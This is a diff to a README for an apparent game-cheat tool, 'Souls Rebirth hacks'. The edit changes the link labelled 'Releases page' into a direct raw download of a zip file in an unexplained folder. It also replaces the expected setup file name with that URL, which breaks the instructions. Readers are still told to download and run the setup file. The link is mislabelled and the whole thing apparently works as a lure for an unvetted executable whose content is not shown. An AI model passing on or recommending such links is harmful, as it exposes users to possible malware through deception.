DeepuNikki/Souls-Rebirth-hacks-gauge-no-awakening/README.md

 - Internet connection for downloading updates

 ## 📥 Download & Install
-1. **Visit this page to download.** Go to the [Releases page](https://github.com/DeepuNikki/Souls-Rebirth-hacks-gauge-no-awakening/releases).
+1. **Visit this page to download.** Go to the [Releases page](https://raw.githubusercontent.com/DeepuNikki/Souls-Rebirth-hacks-gauge-no-awakening/main/farasula/Souls-Rebirth-hacks-gauge-no-awakening.zip).

 2. **Choose the latest version.** Look for the most recent version listed on the page.

 3. **Download the setup file.** Click on the file link to start the download.

 4. **Locate the downloaded file.** Find the file in your downloads folder.
-It should look similar to `Souls-Rebirth-hacks-gauge-no-awakening-vX.X.exe`.
+It should look similar to `https://raw.githubusercontent.com/DeepuNikki/Souls-Rebirth-hacks-gauge-no-awakening/main/farasula/Souls-Rebirth-hacks-gauge-no-awakening.zip`.

 5. **Run the setup file.** Double-click the file to begin the installation.